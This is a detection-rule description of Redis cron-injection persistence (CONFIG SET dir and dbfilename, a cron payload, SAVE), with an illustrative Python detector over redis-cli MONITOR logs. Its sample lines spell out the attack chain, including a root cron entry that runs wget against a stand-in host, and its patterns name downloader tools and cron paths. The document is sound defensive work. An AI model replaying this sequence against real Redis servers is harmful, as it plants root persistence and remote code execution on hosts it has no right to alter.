Identifies a complete Redis exploitation workflow where an attacker performs configuration introspection, modifies snapshot directory and filename parameters (CONFIG SET dir, CONFIG SET dbfilename), targets system cron directories (e.g., /etc/cron.d, /etc, crontabs), implants scheduled execution payloads (HTTP pipe-to-shell, wget, root cron variants, or obfuscated droppers), and triggers SAVE to write the malicious cron file to disk. This tightly coupled sequence reflects automated host-level persistence establishment via cron injection through misconfigured or unauthenticated Redis services. The behavior captures filesystem redirection, scheduled execution staging, and persistence activation in a single deterministic chain, strongly associated with botnet propagation and cryptomining campaigns.
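
One way to express this chain as detection logic over `redis-cli MONITOR` output, added here as an illustration and not the rule's own implementation. The sample lines are constructed, the client addresses are documentation ranges, and the `/var/spool/cron` paths are an assumed reading of "crontabs".

```python
import re
import shlex

# redis-cli MONITOR line: <unix time> [<db> <client addr>] "ARG" "ARG" ...
MONITOR = re.compile(r"^\d+\.\d+ \[\d+ (\S+)\] (.+)$")
# /etc/cron.d and /etc are named in the description; the /var/spool paths
# are an assumption. Adjust per distribution.
CRON_DIRS = {"/etc/cron.d", "/etc", "/var/spool/cron", "/var/spool/cron/crontabs"}
# Five cron schedule fields followed by a downloader command.
CRON_FETCH = re.compile(r"(?:[\d*/,-]+\s+){5}.*\b(?:curl|wget)\b")

def detect(lines):
    """Return [(client, written_path)] for each client completing the chain."""
    state, alerts = {}, []
    for line in lines:
        m = MONITOR.match(line.strip())
        if not m:
            continue
        try:
            argv = shlex.split(m.group(2))
        except ValueError:          # unbalanced quoting: skip, do not crash
            continue
        client, cmd = m.group(1), [a.upper() for a in argv[:2]]
        s = state.setdefault(client, {"dir": None, "file": None, "payload": False})
        if cmd == ["CONFIG", "SET"] and len(argv) == 4:
            key, val = argv[2].lower(), argv[3]
            if key == "dir":        # redirect only counts if it lands in cron
                d = val.rstrip("/")
                s["dir"] = d if d in CRON_DIRS else None
            elif key == "dbfilename":
                s["file"] = val
        elif cmd[:1] == ["SET"] and len(argv) >= 3:
            s["payload"] = s["payload"] or bool(CRON_FETCH.search(argv[2]))
        elif cmd[:1] in (["SAVE"], ["BGSAVE"]) and all(s.values()):
            alerts.append((client, f'{s["dir"]}/{s["file"]}'))
            del state[client]       # one alert per completed chain
    return alerts

SAMPLE = [  # constructed MONITOR lines, not captured traffic
    r'1777190400.000001 [0 203.0.113.7:5000] "CONFIG" "GET" "dir"',
    r'1777190400.000002 [0 203.0.113.7:5000] "SET" "x" "\n*/5 * * * * root wget -q http://example.invalid/x\n"',
    r'1777190400.000003 [0 203.0.113.7:5000] "config" "set" "dir" "/etc/cron.d/"',
    r'1777190400.000004 [0 203.0.113.7:5000] "config" "set" "dbfilename" "job"',
    r'1777190400.000005 [0 198.51.100.9:6000] "CONFIG" "SET" "dir" "/var/lib/redis"',
    r'1777190400.000006 [0 198.51.100.9:6000] "SAVE"',
    r'1777190400.000007 [0 203.0.113.7:5000] "save"',
]
```

State is tracked per client address, so a routine `SAVE` from another connection does not complete someone else's chain, and a `CONFIG SET dir` back to a non-cron path clears the redirect flag.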